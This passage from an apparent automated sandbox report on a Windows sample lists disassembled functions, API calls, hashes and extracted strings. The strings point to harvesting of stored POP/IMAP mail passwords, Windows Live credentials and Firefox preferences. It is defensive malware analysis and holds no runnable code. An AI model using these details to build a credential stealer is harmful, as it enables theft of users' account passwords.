                                                                                                                  • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                  • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                  • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                  Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                  • strchr.MSVCRT ref: 0040327B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileStringstrchr
                                                                                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                  • API String ID: 1348940319-1729847305
                                                                                                                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                  Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                  • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                  • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                  Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                  • memset.MSVCRT ref: 0040FA1E
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                  • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                  • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                  • API String ID: 945165440-3589380929
                                                                                                                  • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                  • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                  • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                  • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                  Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                    • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                    • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                  • strchr.MSVCRT ref: 0040371F
                                                                                                                  • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                  • strlen.MSVCRT ref: 00403778
                                                                                                                  • sprintf.MSVCRT ref: 0040379C
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                  • String ID: %s@gmail.com
                                                                                                                  • API String ID: 3261640601-4097000612
                                                                                                                  • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                  • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                  • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                  • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                  Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004094C8
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                  • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                  • memset.MSVCRT ref: 0040950C
                                                                                                                  • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                  • _strcmpi.MSVCRT ref: 00409531
                                                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                  • API String ID: 3411445237-4169760276
                                                                                                                  • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                  • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                  • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                  • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                  Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                    • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                    • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                    • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$DialogMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2485852401-0
                                                                                                                  • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                  • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                  • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                  • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                  Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3642520215-0
                                                                                                                  • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                  • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                  • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                  • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                  Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                                                  • memset.MSVCRT ref: 00405C3B
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                                                  • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2313361498-0
                                                                                                                  • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                  • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                  • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                  • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                  Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                  • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Defer$Rect$BeginClient
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2126104762-0
                                                                                                                  • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                  • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                  • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                  • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                  Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                  • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                  • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                  • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1999381814-0
                                                                                                                  • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                  • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                  • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                  • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                  Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                  • API String ID: 1297977491-3883738016
                                                                                                                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                  Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                    • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                    • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                    • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                  • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                  • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                  • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                  • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                  Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040DAE3
                                                                                                                  • memset.MSVCRT ref: 0040DAF7
                                                                                                                  • memset.MSVCRT ref: 0040DB0B
                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                  • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset$strlen$_memicmp
                                                                                                                  • String ID: user_pref("
                                                                                                                  • API String ID: 765841271-2487180061
                                                                                                                  • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                  • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                  • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                  • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                  Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                  • memset.MSVCRT ref: 004058C3
                                                                                                                  • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                  • SetFocus.USER32(?), ref: 00405976
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4281309102-0
                                                                                                                  • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                  • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                  • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                  • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                  Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                  • sprintf.MSVCRT ref: 0040A921
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                  • API String ID: 1631269929-4153097237
                                                                                                                  • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                  • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                  • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                  • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                  Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040810E
                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
